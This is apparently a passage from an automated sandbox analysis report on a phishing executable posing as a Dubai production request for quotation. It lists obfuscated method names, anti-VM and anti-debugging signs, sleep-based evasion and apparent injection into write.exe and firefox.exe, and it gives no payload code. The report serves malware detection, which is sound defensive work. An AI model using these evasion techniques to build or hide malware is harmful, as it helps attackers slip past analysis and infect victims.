Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, cRI5XtfVkGoFvkxpKo.cs	High entropy of concatenated method names: 'zLALOHwRVy', 'bOgLA2CfGC', 'dwVXhcrSZd', 'dGYXFwYCgZ', 'cECX66HDBB', 'q7EXRUjW3C', 'eeQX8WaYdg', 'HHnXvyTh6i', 'BHSX31piWP', 'ggkXGIZQjD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, v7slOGXZe0WaGxgtoj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R1qIicDKKF', 'nakIBVZ9rM', 'FWEIzufiNr', 'GW0gZ82hXX', 'Kc5g2Nix1E', 'jY4gIpgygX', 'sOjgg5sHoI', 'wdQv3BdmOmHSNcOah4M'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, XakkLri88jm2GEPywk.cs	High entropy of concatenated method names: 'r3osEj53L9', 'Ki5sUm0Rrw', 'nXFshw99oi', 'nvysFZp1Ao', 'NRHs5wuusG', 'LRfs691SoQ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, x4sY1x9IRZx67koOP1.cs	High entropy of concatenated method names: 'y7mMHnLubB', 'QwXMBdQjdi', 'OacsZZB0qX', 'Vuvs2KgrPw', 'bHoMVqYbFR', 'OscMjqi3ZZ', 'poGMxKcT4F', 'TSHM5iBbPg', 'TY5MldvqZb', 'hxQMw6TaC9'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, BGwncZwrGigqoHvJ7n.cs	High entropy of concatenated method names: 'ToString', 'jfreVllbV4', 'r7ReUghjCG', 'tyXehKZ0yJ', 'OfDeFRsw8f', 'gZde6I59n3', 'aSQeRd8EO9', 'O0de83emq0', 'lreevVZyxu', 'i1Le3taumh'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, dhUaC4qtpC1H6ohXG6.cs	High entropy of concatenated method names: 'tS02a29uMA', 'C7527rQjpJ', 'MBv2mWa2qM', 'fGq2DDIRI5', 'rxp2cKoj6Q', 'jw12eJS6En', 'btI55W6ptBS2RlILrH', 'cSDXTyu6SYfrZI4PMK', 'DwC22bH8Dx', 'i2X2gNb3gN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, CfnJqvJBvWa2qMTGqD.cs	High entropy of concatenated method names: 'OgHXyVpCBM', 'LTbXtAMC6u', 'V4DXYWoUbE', 'VEnXJZssOo', 'NetXcaYTij', 'o7VXeJZUuj', 'CVbXMvS9eg', 'EqTXsO8nKW', 'ip1XkmKvsJ', 'L3hXpISwH7'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, CijKws2gU4kwa3eXEg7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnEp51bvLK', 'ShbplNry72', 'c6XpwZ05tY', 'op7puvP9hK', 'fUqpQaNMus', 'cnpp9kiwWe', 'XORpbonxS5'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, kSAxf32ZOs2miS70fmF.cs	High entropy of concatenated method names: 'P7rkWahmCy', 'UbRkNrbxNB', 'NBFk45xM32', 'aXvkyTrNPR', 'NDOkOIQhlC', 'qINktkTRy8', 'BWAkANBHWo', 'ySHkYRSbq8', 'RvbkJT9Nef', 'LlRkfkxvuy'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, ycIwil3e76EbpaLWOT.cs	High entropy of concatenated method names: 'pnUaWjoPvZ', 'ipWaNWTKQH', 'M8La4mVDkW', 'YVQaymro46', 'j8QaOny7Es', 'UsMatRfXq9', 'E1waA5Y1oc', 'LU2aYTVUED', 'uStaJaD4dF', 'vunafOqTof'

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	File created: \al hayat dubai uae production rfq 2024.exe
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	File created: \al hayat dubai uae production rfq 2024.exe			Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe PID: 8576, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D144
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D604
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D764
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D324
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D364
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D004
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2FF74
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FFF5FB2D864

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 8D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 6E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: 9D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Memory allocated: AD50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Code function: 2_2_01641763 rdtsc

2_2_01641763

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\write.exe

Window / User API: threadDelayed 9088

Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\write.exe	API coverage: 1.9 %

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe TID: 8600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 9184	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 9184	Thread sleep time: -238000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 9184	Thread sleep count: 9088 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 9184	Thread sleep time: -18176000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe TID: 9192	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe TID: 9192	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe TID: 9192	Thread sleep time: -47000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: write.exe, 00000004.00000002.112735509747.0000000003054000.00000004.00000020.00020000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113717449481.0000000001189000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.109374986121.000001C0908E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Code function: 2_2_01641763 rdtsc

2_2_01641763

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Code function: 2_2_00417703 LdrLoadDll,

2_2_00417703

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163716D mov eax, dword ptr fs:[00000030h]	2_2_0163716D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FA147 mov eax, dword ptr fs:[00000030h]	2_2_015FA147
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FA147 mov eax, dword ptr fs:[00000030h]	2_2_015FA147
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FA147 mov eax, dword ptr fs:[00000030h]	2_2_015FA147
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01606179 mov eax, dword ptr fs:[00000030h]	2_2_01606179
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0165717A mov eax, dword ptr fs:[00000030h]	2_2_0165717A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0165717A mov eax, dword ptr fs:[00000030h]	2_2_0165717A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169314A mov eax, dword ptr fs:[00000030h]	2_2_0169314A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169314A mov eax, dword ptr fs:[00000030h]	2_2_0169314A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169314A mov eax, dword ptr fs:[00000030h]	2_2_0169314A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169314A mov eax, dword ptr fs:[00000030h]	2_2_0169314A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D5149 mov eax, dword ptr fs:[00000030h]	2_2_016D5149
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D3157 mov eax, dword ptr fs:[00000030h]	2_2_016D3157
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D3157 mov eax, dword ptr fs:[00000030h]	2_2_016D3157
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D3157 mov eax, dword ptr fs:[00000030h]	2_2_016D3157
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163415F mov eax, dword ptr fs:[00000030h]	2_2_0163415F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01637128 mov eax, dword ptr fs:[00000030h]	2_2_01637128
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01637128 mov eax, dword ptr fs:[00000030h]	2_2_01637128
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113 mov eax, dword ptr fs:[00000030h]	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF13E mov eax, dword ptr fs:[00000030h]	2_2_016BF13E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168A130 mov eax, dword ptr fs:[00000030h]	2_2_0168A130
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162510F mov eax, dword ptr fs:[00000030h]	2_2_0162510F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160510D mov eax, dword ptr fs:[00000030h]	2_2_0160510D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01630118 mov eax, dword ptr fs:[00000030h]	2_2_01630118
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C81EE mov eax, dword ptr fs:[00000030h]	2_2_016C81EE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C81EE mov eax, dword ptr fs:[00000030h]	2_2_016C81EE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0160A1E3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0160A1E3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0160A1E3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0160A1E3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0160A1E3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016091E5 mov eax, dword ptr fs:[00000030h]	2_2_016091E5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016091E5 mov eax, dword ptr fs:[00000030h]	2_2_016091E5
